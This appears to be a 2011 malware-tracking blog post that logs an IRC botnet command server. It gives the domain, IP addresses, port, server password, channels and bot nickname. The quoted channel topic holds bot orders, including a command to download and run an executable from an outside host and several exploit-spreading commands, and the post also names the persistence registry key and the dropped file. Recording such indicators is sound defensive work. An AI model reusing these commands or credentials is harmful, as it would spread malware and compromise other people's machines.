Botnet IRC C&C
Found 2 addresses
addr: aaaa.forexinvest4.com ip: 109.196.130.66
addr: aaaa.forexinvest4.com ip: 109.196.130.50
aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe
Monday, January 10, 2011
aaaa.forexinvest4.com
Posted by Role at 11:28 PM
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment